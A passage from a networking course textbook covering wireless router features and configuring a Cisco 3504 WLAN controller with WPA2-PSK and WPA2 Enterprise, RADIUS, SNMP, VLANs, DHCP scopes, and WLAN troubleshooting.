The [Link] IPv4 address is publicly routable on the internet. Any address with the 10 in the first octet
is a private IPv4 address and cannot be routed on the internet. Therefore, the router will use a process called
Network Address Translation (NAT) to convert private IPv4 addresses to internet-routable IPv4 addresses.
With NAT, a private (local) source IPv4 address is translated to a public (global) address. The process is
reversed for incoming packets. The router is able to translate many internal IPv4 addresses into public
addresses, by using NAT.

Some ISPs use private addressing to connect to customer devices. However, eventually, your traffic will leave
the provider’s network and be routed on the internet. To see the IP addresses for your devices, search the
internet for “what is my IP address.” Do this for other devices on the same network and you will see that they
all share the same public IPv4 address. NAT makes this possible by tracking the source port numbers for
every session established by a device. If your ISP has IPv6 enabled, you will see a unique IPv6 address for
each device.

13.1.8 Quality of Service

Many wireless routers have an option for configuring Quality of Service (QoS). By configuring QoS, you can
guarantee that certain traffic types, such as voice and video, are prioritized over traffic that is not as time-
sensitive, such as email and web browsing. On some wireless routers, traffic can also be prioritized on specific
ports.

The figure is a simplified mockup of a QoS interface based on a Netgear GUI. You will usually find the QoS
settings in the advanced menus. If you have a wireless router available, investigate the QoS settings.
Sometimes, these might be listed under “bandwidth control” or something similar. Consult the wireless router’s
documentation or search the internet for “qos settings” for your router’s make and model.

13.1.9 Port Forwarding

Wireless routers typically block TCP and UDP ports to prevent unauthorized access in and out of a LAN.
However, there are situations when specific ports must be opened so that certain programs and applications

129
can communicate with devices on different networks. Port forwarding is a rule-based method of directing traffic
between devices on separate networks.

When traffic reaches the router, the router determines if the traffic should be forwarded to a certain device
based on the port number found with the traffic. For example, a router might be configured to forward port 80,
which is associated with HTTP. When the router receives a packet with the destination port of 80, the router
forwards the traffic to the server inside the network that serves web pages. In the figure, port forwarding is
enabled for port 80 and is associated with the web server at IPv4 address [Link].

Port triggering allows the router to temporarily forward data through inbound ports to a specific device. You
can use port triggering to forward data to a computer only when a designated port range is used to make an
outbound request. For example, a video game might use ports 27000 to 27100 for connecting with other
players. These are the trigger ports. A chat client might use port 56 for connecting the same players so that
they can interact with each other. In this instance, if there is gaming traffic on an outbound port within the
triggered port range, inbound chat traffic on port 56 is forwarded to the computer that is being used to play the
video game and chat with friends. When the game is over and the triggered ports are no longer in use, port 56
is no longer allowed to send traffic of any type to this computer.

13.1.10 Packet Tracer – Configure a Wireless Network

In this activity, you will configure a wireless router and an access point to accept wireless clients and route IP
packets.

13.1.11 Lab – Configure a Wireless Network

In this lab, you will configure basic settings on a wireless router and connect a PC to router wirelessly.

130
13.2 Configure a Basic WLAN on the WLC

13.2.1 Video – Configure a Basic WLAN on the WLC

In the previous topic you learned about remote site WLAN configuration. This topic is about configuring a
basic WLAN on the WLC.

Click Play in the figure to view a demonstration of configuring a Cisco 3504 WLC with basic WLAN
connectivity.

13.2.2 WLC Topology

The topology and addressing scheme used for the videos and this topic are shown in the figure and the table.
The access point (AP) is a controller-based AP as opposed to an autonomous AP. Recall that controller-based
APs require no initial configuration and are often called lightweight APs (LAPs). LAPs use the Lightweight
Access Point Protocol (LWAPP) to communicate with a WLAN controller (WLC). Controller-based APs are
useful in situations where many APs are required in the network. As more APs are added, each AP is
automatically configured and managed by the WLC.

The AP is PoE, which means it is powered over the ethernet cable that is attached to the switch.

131
Addressing Table

13.2.3 Log in to the WLC

Configuring a wireless LAN controller (WLC) is not that much different from configuring a wireless router. The
big difference is that a WLC controls APs and provides more services and management capabilities, many of
which are beyond the scope of this module.

Note: The figures in this topic that show the graphical user interface (GUI) and menus are from a Cisco 3504
Wireless Controller. However, other WLC models will have similar menus and features.

The figure shows the user logging into the WLC with credentials that were configured during initial setup.

The Network Summary page is a dashboard that provides a quick overview of the number of configured
wireless networks, associated access points (APs), and active clients. You can also see the number of rogue
access points and clients, as shown in the figure.

132
13.2.4 View AP Information

Click Access Points from the left menu to view an overall picture of the AP’s system information and
performance, as shown in the next figure. The AP is using IP address [Link]. Because Cisco
Discovery Protocol (CDP) is active on this network, the WLC knows that the AP is connected to the
FastEthernet 0/1 port on the switch.

This AP in the topology is a Cisco Aironet 1815i which means you can use the command-line and a limited set
of familiar IOS commands. In the example, the network administrator pinged the default gateway, pinged the
WLC, and verified the wired interface.

133
AP1# ping [Link]
Sending 5, 100-byte ICMP Echos to [Link], timeout is 2 seconds
!!!!!
Success rate is 100 percent(5/5), round-trip min/avg/max=1069812.242/1071814.785/1073817.215
ms
AP1# ping [Link] Sending 5, 100-byte ICMP Echos to [Link], timeout is 2
seconds !!!!!
Success rate is 100 percent(5/5), round-trip min/avg/max = 1055820.953/1057820.738/1059819.928
ms
AP1# show interface wired 0
wired0 Link encap:Ethernet HWaddr [Link]
inet addr:[Link] Bcast:[Link] Mask:[Link]
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:2478 errors:0 dropped:3 overruns:0 frame:0
TX packets:1494 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:80
RX bytes:207632 (202.7 KiB) TX bytes:300872 (293.8 KiB)
AP1#
This AP in the topology is a Cisco Aironet 1815i which means you can use the command-line and a limited set

13.2.5 Advanced Settings

Most WLC will come with some basic settings and menus that users can quickly access to implement a variety
of common configurations. However, as a network administrator, you will typically access the advanced
settings. For the Cisco 3504 Wireless Controller, click Advanced in the upper right-hand corner to access the
advanced Summary page, as shown in the figure. From here, you can access all the features of the WLC.

13.2.6 Configure WLAN

Wireless LAN Controllers have ports and interfaces. Ports are the sockets for the physical connections to the
wired network. They resemble switch ports. Interfaces are virtual. They are created in software and are very

134
similar to VLAN interfaces. In fact, each interface that will carry traffic from a WLAN is configured on the WLC
as a different VLAN. The Cisco 3504 WLC can support 150 access points and 4096 VLANs, however it only
has five physical ports, as shown in the figure. This means that each physical port can support many APs and
WLANs. The ports on the WLC are essentially trunk ports that can carry traffic from multiple VLANs to a
switch for distribution to multiple APs. Each AP can support multiple WLANs.

Basic WLAN configuration on the WLC includes the following steps:

1. Create the WLAN

2. Apply and Enable the WLAN
3. Select the Interface
4. Secure the WLAN
5. Verify the WLAN is Operational
6. Monitor the WLAN
7. View Wireless Client Information

1. Create the WLAN

In the figure, the administrator is creating a new WLAN that will use Wireless_LAN as the name and service
set identifier (SSID). The ID is an arbitrary value that is used to identify the WLAN in display output on the
WLC.

2. Apply and Enable the WLAN

After clicking Apply, the network administrator must enable the WLAN before it can be accessed by users, as
shown in the figure. The Enable checkbox allows the network administrator to configure a variety of features
for the WLAN, as well as additional WLANs, before enabling them for wireless client access. From here, the
network administrator can configure a variety of settings for the WLAN including security, QoS, policies, and
other advanced settings.

135
3. Select the Interface

When you create a WLAN, you must select the interface that will carry the WLAN traffic. The next figure
shows the selection of an interface that has already been created on the WLC. We will learn how to create
interfaces later in this module.

4. Secure the WLAN

Click the Security tab to access all the available options for securing the LAN. The network administrator
wants to secure Layer 2 with WPA2-PSK. WPA2 and 802.1X are set by default. In the Layer 2 Security drop
down box, verify that WPA+WPA2 is selected (not shown). Click PSK and enter the pre-shared key, as shown
in the figure. Then click Apply. This will enable the WLAN with WPA2-PSK authentication. Wireless clients
that know the pre-shared key can now associate and authenticate with the AP.

136
5. Verify the WLAN is Operational

Click WLANs in the menu on the left to view the newly configured WLAN. In the figure, you can verify that
WLAN ID 1 is configured with Wireless_LAN as the name and SSID, it is enabled, and is using WPA2 PSK
security.

6. Monitor the WLAN

Click the Monitor tab at the top to access the advanced Summary page again. Here you can see that
the Wireless_LAN now has one client using its services, as shown in the figure.

137
7. View Wireless Client Details

Click Clients in the left menu to view more information about the clients connected to the WLAN, as shown in
the figure. One client is attached to Wireless_LAN through AP1 and was given the IP address [Link].
DHCP services in this topology are provided by the router.

13.2.7 Packet Tracer – Configure a Basic WLAN on the WLC

In this lab, you will explore some of the features of a wireless LAN controller. You will create a new WLAN on
the controller and implement security on that LAN. Then you will configure a wireless host to connect to the
new WLAN through an AP that is under the control of the WLC. Finally, you will verify connectivity.

13.3 Configure a WPA2 Enterprise WLAN on the WLC

13.3.1 Video – Define a SNMP and RADIUS Server on the WLC

The previous topic covered configuring a basic WLAN on the WLC. Now you will learn about configuring a
WPA2 Enterprise WLAN.

Click Play in the figure to view a demonstration of configuring SNMP and RADIUS services on the WLC.

138
13.3.2 SNMP and RADIUS

In the figure, PC-A is running Simple Network Management Protocol (SNMP) and Remote Authentication Dial-
In User Service (RADIUS) server software. SNMP is used to monitor the network. The network administrator
wants the WLC to forward all SNMP log messages, called traps, to the SNMP server.

In addition, for WLAN user authentication, the network administrator wants to use a RADIUS server for
authentication, authorization, and accounting (AAA) services. Instead of entering a publicly known pre-shared
key to authenticate, as they do with WPA2-PSK, users will enter their own username and password
credentials. The credentials will be verified by the RADIUS server. This way, individual user access can be
tracked and audited if necessary and user accounts can be added or modified from a central location. The
RADIUS server is required for WLANs that are using WPA2 Enterprise authentication.

Note: SNMP server and RADIUS server configuration is beyond the scope of this module.

Topology

13.3.3 Configure SNMP Server Information

Click the MANAGEMENT tab to access a variety of management features. SNMP is listed at the top of the
menu on the left. Click SNMP to expand the sub-menus, and then click Trap Receivers. Click New... to
configure a new SNMP trap receiver, as shown in the figure.

139
Enter the SNMP Community name and the IP address (IPv4 or IPv6) for the SNMP server. Click Apply. The
WLC will now forward SNMP log messages to the SNMP server.

13.3.4 Configure RADIUS Server Information

In our example configuration, the network administrator wants to configure a WLAN using WPA2 Enterprise,
as opposed to WPA2 Personal or WPA2 PSK. Authentication will be handled by the RADIUS server running
on PC-A.

To configure the WLC with the RADIUS server information, click the SECURITY tab
> RADIUS > Authentication. No RADIUS servers are currently configured. Click New... to add PC-A as the
RADIUS server.

140
 1. Click SECURITY
2. Click RADIUS
3. Click Authentication
4. Click New...

Enter the IPv4 address for PC-A and the shared secret. This is the password used between the WLC and the
RADIUS server. It is not for users. Click Apply, as shown in the figure.

After clicking Apply, the list of configured RADIUS Authentication Servers refreshes with the new server
listed, as shown in the figure.

13.3.5 Video – Configure a VLAN for a New WLAN

Click Play in the figure to view a demonstration of configuring a VLAN on the WLC.

141
13.3.6 Topology with VLAN 5 Addressing

Each WLAN configured on the WLC needs its own virtual interface. The WLC has five physical ports for data
traffic. Each physical port can be configured to support multiple WLANs, each on its own virtual interface.
Physical ports can also be aggregated to create high-bandwidth links.

The network administrator has decided that the new WLAN will use interface VLAN 5 and network
[Link]/24. R1 already has a subinterface configured and active for VLAN 5, as shown in the topology
and show ip interface brief output.

Topology

R1# show ip interface brief

Interface IP-Address OK? Method Status Protocol
FastEthernet0/0 [Link] YES manual up up
FastEthernet0/1 unassigned YES unset up up
FastEthernet0/1.1 [Link] YES manual up up
FastEthernet0/1.5 [Link] YES manual up up
(output omitted)
R1#

13.3.7 Configure a New interface

VLAN interface configuration on the WLC includes the following steps:

1. Create a new interface.

2. Configure the VLAN name and ID.

142
 3. Configure the port and interface address.
4. Configure the DHCP server address.
5. Apply and Confirm.
6. Verify Interfaces.

1. Create a new interface.

To add a new interface, click CONTROLLER > Interfaces > New..., as shown in the figure.

1. Click CONTROLLER
2. Click Interfaces
3. Click New...

2. Configure the VLAN name and ID.

In the figure, the network administrator configures the interface name as vlan5 and the VLAN ID as 5.
Clicking Apply will create the new interface.

3. Configure the port and interface address.

On the Edit page for the interface, configure the physical port number. G1 in the topology is Port Number 1 on
the WLC. Then configure the VLAN 5 interface addressing. In the figure, VLAN 5 is assigned IPv4 address
[Link]/24. R1 is the default gateway at IPv4 address [Link].

143
4. Configure the DHCP server address.

In larger enterprises, WLCs will be configured to forward DHCP messages to a dedicated DHCP server. Scroll
down the page to configure the primary DHCP server as IPv4 address [Link], as shown in the figure.
This is the default gateway router address. The router is configured with a DHCP pool for the WLAN network.
As hosts join the WLAN that is associated with the VLAN 5 interface, they will receive addressing information
from this pool.

5. Apply and Confirm.

Scroll to the top and click Apply, as shown in the figure. Click OK for the warning message.

144
6. Verify Interfaces.

Click Interfaces. The new vlan5 interface is now shown in the list of interfaces with its IPv4 address, as
shown in the figure.

13.3.8 Video – Configure a DHCP Scope

Click Play in the figure to view a demonstration of configuring DHCP services.

13.3.9 Configure a DHCP Scope

DHCP scope configuration includes the following steps:

1. Create a new DHCP scope.

2. Name the DHCP scope.
3. Verify the new DHCP scope.
4. Configure and enable the new DHCP scope.
5. Verify the enable DHCP scope

1. Create a new DHCP scope.

A DHCP scope is very similar to a DHCP pool on a router. It can include a variety of information including a
pool of addresses to assign to DHCP clients, DNS server information, lease times, and more. To configure a
new DHCP scope, click Internal DHCP Server > DHCP Scope > New..., as shown in the figure.

145
 1. Click Internal DHCP Server.
2. Click DHCP Scope.
3. Click New...

2. Name the DHCP scope.

On the next screen, name the scope. Because this scope will apply to the wireless management network, the
network administrator uses Wireless_Management as the Scope Name and clicks Apply.

3. Verify the new DHCP scope.

You are returned to the DHCP Scopes page and can verify the scope is ready to be configured. Click the new
Scope Name to configure the DHCP scope.

146
4. Configure and enable the new DHCP scope.

On the Edit screen for the Wireless_Management scope, configure a pool of addresses for the
[Link]/24 network starting at .240 and ending at .249. The network address and subnet mask are
configured. The default router IPv4 address is configured, which is the subinterface for R1 at [Link].
For this example, the rest of the scope is left unchanged. The network administrator selects Enabled from the
Status drop down and clicks Apply.

5. Verify the enable DHCP scope

The network administrator is returned to the DHCP Scopes page and can verify the scope is ready to be
allocated to a new WLAN.

13.3.10 Video – Configure a WPA2 Enterprise WLAN

Click Play in the figure to view a demonstration of configuring a new WLAN with WPA2 Enterprise on the
WLC.

13.3.11 Configure a WPA2 Enterprise WLAN

By default, all newly created WLANs on the WLC will use WPA2 with Advanced Encryption System (AES).
802.1X is the default key management protocol used to communicate with the RADIUS server. Because the
network administrator already configured the WLC with the IPv4 address of the RADIUS server running on
PC-A, the only configuration left to do is to create a new WLAN to use interface vlan5.

147
Configuring a new WLAN on the WLC includes the following steps:

1. Create a new WLAN.

2. Configure the WLAN name and SSID.
3. Enable the WLAN for VLAN 5.
4. Verify AES and 802.1X defaults.
5. Configure WLAN security to use the RADIUS server.
6. Verify the new WLAN is available.

1. Create a new WLAN.

Click the WLANs tab and then Go to create a new WLAN, as shown in the figure.

2. Configure the WLAN name and SSID.

Fill in the profile name and SSID. In order to be consistent with the VLAN that was previously configured,
choose an ID of 5. However, any available value can be used. Click Apply to create the new WLAN, as shown
in the figure.

3. Enable the WLAN for VLAN 5.

The WLAN is created but it still needs to be enabled and associated with the correct VLAN interface. Change
the status to Enabled and choose vlan5 from the Interface/Interface Group(G) dropdown list. Click Apply and
click OK to accept the popup message, as shown in the figure.

148
 1. Click Enabled
2. Choose Vlan5
3. Click Apply
4. Click Ok

4. Verify AES and 802.1X defaults.

Click the Security tab to view the default security configuration for the new WLAN. The WLAN will use WPA2
security with AES encryption. Authentication traffic is handled by 802.1X between the WLC and the RADIUS
server.

The figure depicts verifying AES and 802.1X defaults on a WLC GUI. The WLANs tab on the main menu is
selected. Under WLANs > Edit the Security sub-menu is selected and outlined with a rectangle and the
number 1. Under WPA2 Encryption, AES is selected and outlined with a rectangle and the number 2. Under
Authentication Key Management, 802.1X is enabled and outlined with a rectangle and the number 3.

149
5. Configure the RADIUS server.

We now need to select the RADIUS server that will be used to authenticate users for this WLAN. Click
the AAA Servers tab. In the dropdown box select the RADIUS server that was configured on the WLC
previously. Apply your changes.

6. Verify that the new WLAN is available.

To verify the new WLAN is listed and enabled, click Back or the WLANs submenu on the left. Both
the Wireless_LAN WLAN and the CompanyName WLAN are listed. In the figure, notice that both are
enabled. Wireless_LAN is using WPA2 with PSK authentication. CompanyName is using WPA2 security
with 802.1X authentication.

13.3.12 Packet Tracer – Configure a WPA2 Enterprise WLAN on the WLC

In this activity, you will configure a new WLAN on a wireless LAN controller (WLC), including the VLAN
interface that it will use. You will configure the WLAN to use a RADIUS server and WPA2-Enterprise to
authenticate users. You will also configure the WLC to use an SNMP server.

150
13.4 Troubleshoot WLAN Issues

13.4.1 Troubleshooting Approaches

In the previous topics, you learned about WLAN configuration. Here we will discuss troubleshooting WLAN
issues.

Network problems can be simple or complex, and can result from a combination of hardware, software, and
connectivity issues. Technicians must be able to analyze the problem and determine the cause of the error
before they can resolve the network issue. This process is called troubleshooting.

Troubleshooting any sort of network problem should follow a systematic approach. A common and efficient
troubleshooting methodology is based on the scientific method and can be broken into the six main steps
shown in the table.

Step Title Description

The first step in the troubleshooting process is to identify the problem.

Identify the
1 While tools can be used in this step, a conversation with the user is often
Problem
very helpful.

After you have talked to the user and identified the problem, you can try
Establish a Theory
2 and establish a theory of probable causes. This step often yields more than
of Probable Causes
a few probable causes to the problem.

Based on the probable causes, test your theories to determine which one is
the cause of the problem. A technician will often apply a quick procedure to
Test the Theory to
3 test and see if it solves the problem. If a quick procedure does not correct
Determine Cause
the problem, you might need to research the problem further to establish
the exact cause.

Establish a Plan of
Action to Resolve
After you have determined the exact cause of the problem, establish a plan
4 the Problem and
of action to resolve the problem and implement the solution.
Implement the
Solution

Verify Full System

Functionality and
After you have corrected the problem, verify full functionality and, if
5 Implement
applicable, implement preventive measures.
Preventive
Measures

Document
In the final step of the troubleshooting process, document your findings,
6 Findings, Actions,
actions, and outcomes. This is very important for future reference.
and Outcomes

To assess the problem, determine how many devices on the network are experiencing the problem. If there is
a problem with one device on the network, start the troubleshooting process at that device. If there is a
problem with all devices on the network, start the troubleshooting process at the device where all other
devices are connected. You should develop a logical and consistent method for diagnosing network problems
by eliminating one problem at a time.

151
13.4.2 Wireless Client Not Connecting

When troubleshooting a WLAN, a process of elimination is recommended.

In the figure, a wireless client is not connecting to the WLAN.

The figure shows a network topology with a wireless client not able to connect to the AP. The figure has a
router connected to a switch. The switch is connected to a second switch. The second switch is connected to
a WLC, 2 PCs and the AP. The AP is wirelessly connected to a Cell phone, Tablet and Laptop. However the
Laptop connection to the AP has an X indicating no connection has been formed.

If there is no connectivity, check the following:

• Confirm the network configuration on the PC using the ipconfig command. Verify that the PC has
received an IP address via DHCP or is configured with a static IP address.
• Confirm that the device can connect to the wired network. Connect the device to the wired LAN and ping a
known IP address.
• If necessary, reload drivers as appropriate for the client. It may be necessary to try a different wireless
NIC.
• If the wireless NIC of the client is working, check the security mode and encryption settings on the client. If
the security settings do not match, the client cannot gain access to the WLAN.

If the PC is operational but the wireless connection is performing poorly, check the following:

• How far is the PC from an AP? Is the PC out of the planned coverage area (BSA)?
• Check the channel settings on the wireless client. The client software should detect the appropriate
channel as long as the SSID is correct.
• Check for the presence of other devices in the area that may be interfering with the 2.4 GHz band.
Examples of other devices are cordless phones, baby monitors, microwave ovens, wireless security
systems, and potentially rogue APs. Data from these devices can cause interference in the WLAN and
intermittent connection problems between a wireless client and AP.

Next, ensure that all the devices are actually in place. Consider a possible physical security issue. Is there
power to all devices and are they powered on?

Finally, inspect links between cabled devices looking for bad connectors or damaged or missing cables. If the
physical plant is in place, verify the wired LAN by pinging devices, including the AP. If connectivity still fails at
this point, perhaps something is wrong with the AP or its configuration.

152
When the user PC is eliminated as the source of the problem, and the physical status of devices is confirmed,
begin investigating the performance of the AP. Check the power status of the AP.

13.4.3 Troubleshooting When the Network is Slow

To optimize and increase the bandwidth of 802.11 dual-band routers and APs, either:

• Upgrade your wireless clients - Older 802.11b, 802.11g, and even 802.11n devices can slow the entire
WLAN. For the best performance, all wireless devices should support the same highest acceptable
standard. Although 802.11ax was released in 2019, 802.11ac is most likely that highest standard that
enterprises can currently enforce.
• Split the traffic - The easiest way to improve wireless performance is to split the wireless traffic between
the 802.11n 2.4 GHz band and the 5 GHz band. Therefore, 802.11n (or better) can use the two bands as
two separate wireless networks to help manage the traffic. For example, use the 2.4 GHz network for
basic internet tasks, such as web browsing, email, and downloads, and use the 5 GHz band for streaming
multimedia, as shown in the figure.

The figure depicts a home network splitting the traffic between 2.4GHz and 5GHz. The WLC is connected to a
television, cell phone and tablet using 5GHz. It is also connected to two laptops using 2.4 GHz.

There are several reasons for using a split-the-traffic approach:

• The 2.4 GHz band may be suitable for basic Internet traffic that is not time-sensitive.
• The bandwidth may still be shared with other nearby WLANs.
• The 5 GHz band is much less crowded than the 2.4 GHz band; ideal for streaming multimedia.
• The 5 GHz band has more channels; therefore, the channel chosen is likely interference-free.

By default, dual-band routers and APs use the same network name on both the 2.4 GHz band and the 5 GHz
band. The simplest way to segment traffic is to rename one of the wireless networks. With a separate,
descriptive name, it is easier to connect to the right network.

To improve the range of a wireless network, ensure the wireless router or AP location is free of obstructions,
such as furniture, fixtures, and tall appliances. These block the signal, which shortens the range of the WLAN.

153
If this still does not solve the problem, then a Wi-Fi Range Extender or deploying the Powerline wireless
technology may be used.

13.4.4 Updating Firmware

Most wireless routers and APs offer upgradable firmware. Firmware releases may contain fixes for common
problems reported by customers as well as security vulnerabilities. You should periodically check the router or
AP for updated firmware. In the figure, the network administrator is verifying that the firmware is up to date on
a Cisco Meraki AP.

On a WLC, there will most likely be the ability to upgrade the firmware on all APs that the WLC controls. In the
next figure, the network administrator is downloading the firmware image that will be used to upgrade all the
APs.

154
On a Cisco 3504 Wireless Controller, Click the WIRELESS tab > Access Points from the left menu > Global
Configuration submenu. Then scroll to the bottom of the page for the AP Image Pre-download section.

Users will be disconnected from the WLAN and the internet until the upgrade finishes. The wireless router may
need to reboot several times before normal network operations are restored.

13.4.5 Packet Tracer – Troubleshoot WLAN Issues

Now that you have learned how to configure wireless in home and enterprise networks, you need to learn how
to troubleshoot in both wireless environments. Your goal is to enable connectivity between hosts on the
networks to the Web Server by both IP address and URL. Connectivity between the home and enterprise
networks is not required.

13.5 Module Practice and Summary

13.5.1 Packet Tracer - WLAN Configuration

In this activity, you will configure both a wireless home router and a WLC-based network. You will implement
both WPA2-PSK and WPA2-Enterprise security.

13.5.2 What did I learn in this module?

Remote workers, small branch offices, and home networks often use a wireless router, which typically include
a switch for wired clients, a port for an internet connection (sometimes labeled “WAN”), and wireless
components for wireless client access. Most wireless routers are preconfigured to be connected to the
network and provide services. The wireless router uses DHCP to automatically provide addressing information
to connected devices. Your first priority should be to change the username and password of your wireless
router. Use your router’s interface to complete basic network and wireless setup. If you want to extend the
range beyond approximately 45 meters indoors and 90 meters outdoors, you can add wireless access points.
The router will use a process called Network Address Translation (NAT) to convert private IPv4 addresses to
Internet-routable IPv4 addresses. By configuring QoS, you can guarantee that certain traffic types, such as
voice and video, are prioritized over traffic that is not as time-sensitive, such as email and web browsing.

Lightweight APs (LAPs) use the Lightweight Access Point Protocol (LWAPP) to communicate with a WLAN
controller (WLC). Configuring a wireless LAN controller (WLC) is similar to configuring a wireless router except
that a WLC controls APs and provides more services and management capabilities. Use the WLC interface to
view an overall picture of the AP’s system information and performance, to access advanced settings and to
configure a WLAN.

SNMP is used monitor the network. The WLC is set to forward all SNMP log messages, called traps, to the
SNMP server. For WLAN user authentication, a RADIUS server is used for authentication, accounting, and
auditing (AAA) services. Individual user access can be tracked and audited. Use the WLC interface to
configure SNMP server and RADIUS server information, VLAN interfaces, DHCP scope, and a WPA2
Enterprise WLAN.

There are six steps to the troubleshooting process. When troubleshooting a WLAN, a process of elimination is
recommended. Common problems are: no connectivity and poorly performing wireless connection when the
PC is operational. To optimize and increase the bandwidth of 802.11 dual-band routers and APs, either:
upgrade your wireless clients or split the traffic. Most wireless routers and APs offer upgradable firmware.
Firmware releases may contain fixes for common problems reported by customers as well as security
vulnerabilities. You should periodically check the router or AP for updated firmware.

155
13.5.3 Module Quiz – WLAN Configuration

156
157
158
159
160
Glossary

AP – Access Point

BYODs – Bring Your Own Devices

DDoS – Distributed Denial of Service

VPN – Virtual Private Network

NGFW – Next- Generation Firewall

NAC – Network Access Control

WLCs – Wireless LAN Controllers

161